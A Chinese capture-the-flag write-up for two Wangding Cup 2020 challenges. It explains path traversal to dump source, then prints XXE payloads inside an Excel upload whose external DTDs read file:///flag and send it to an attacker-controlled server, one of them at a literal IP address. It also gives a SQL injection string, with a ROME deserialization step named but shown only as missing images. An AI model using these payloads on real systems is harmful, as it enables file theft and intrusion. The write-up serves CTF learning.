网鼎杯 2020 filejava
https://www.4armed.co/blog/exploiting-xxe-with-excel/
https://xz.aliyun.com/t/7747
下载文件处有filename目录穿越,结合报错可知道源码位置从而dump下源码开始审计

在这里插入图片描述

在这里插入图片描述
看到这里就很明显了,判断后缀名应该是xlsx,开头限制了为excel-,考的就是excel进行xxe攻击
最开始使用得是这种打法
| <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <!DOCTYPE ANY[ <!ENTITY % file SYSTEM "file:///flag"> <!ENTITY % remote SYSTEM "http://vps:2122/1.dtd"> %remote; %all; ]> <root>&send;</root>
|
1.dtd为
| <!ENTITY % all "<!ENTITY send SYSTEM 'http://vps:2122/%file;'>">
|
感觉都行的,但是怎么打也打不通,后来换了一下,

在这里插入图片描述
file.dtd中为
| <!ENTITY % file SYSTEM "file:///flag"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://39.107.239.30:3333?p=%file;'>">
|

在这里插入图片描述

在这里插入图片描述
网鼎杯ThinkJava
拼接导致注入漏洞

在这里插入图片描述
myapp#' union select pwd from user#
这里还需要保证前面的数据库连接正确

在这里插入图片描述
登录后发现提示,这里用burp分析发现是rome漏洞,直接一把梭

在这里插入图片描述
生成payload

在这里插入图片描述
监听即可

在这里插入图片描述